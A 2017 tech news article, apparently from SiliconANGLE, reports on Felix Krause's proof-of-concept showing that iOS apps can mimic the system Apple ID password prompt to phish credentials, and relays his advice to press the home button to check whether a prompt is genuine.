UPDATED 22:26 EDT / OCTOBER 10 2017

APPS

Proof-of-concept demonstrates how easy it is to fool Apple users with a simple popup

Apple iOS users are being warned to be aware of malicious popups after a mobile app developer published a proof-of-concept phishing attack that mimics a login prompt using a website popup.

The proof-of-concept was detailed by Felix Krause, founder of the open-source app-building tool fastlane. He wrote in a blog post that Apple’s reliance on asking users to regularly enter their passwords to undertake a range of functions presents a security hole that could easily be used by hackers to steal user credentials.

iOS asks users for their passwords for many reasons, but the most common ones are recently installed iOS operating system updates or iOS apps that are stuck during installation.

“Users are trained to just enter their Apple ID password whenever iOS prompts you to do so. However, those popups are not only shown on the lock screen, and the home screen, but also inside random apps, e.g. when they want to access iCloud, GameCenter or In-App-Purchases,” he wrote. “This could easily be abused by any app, just by showing an UIAlertController, that looks exactly like the system dialog.”

The proof-of-concept involves the use of an overlay popup that mimics the Apple iOS password prompt. In Krause’s picture (above), the popup (on the right) is indistinguishable from the standard iOS password prompt on the left.

“iOS should very clearly distinguish between system UI and app UI elements, so that ideally it’s … obvious for the average smartphone user that something seems off,” Krause added. “This is a tricky problem to solve, and Web browsers are still tackling it; you still have websites that make popups look like macOS/iOS popups so that many users think [are] system message[s].”

Krause recommends that iPhone and iPad users hit the home button if prompted to enter their password to determine whether the request is legitimate or not. In the event the app closes along with the popup, it was a phishing attack, but where the app and password prompt remain on screen, it’s a legitimate request.

As an alternative, users can switch to Android, which despite being more open to malware doesn’t suffer from epic user experience fails like Apple products sometimes do, such as in this case.

Image: Felix Krause

A message from John Furrier, co-founder of SiliconANGLE:

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU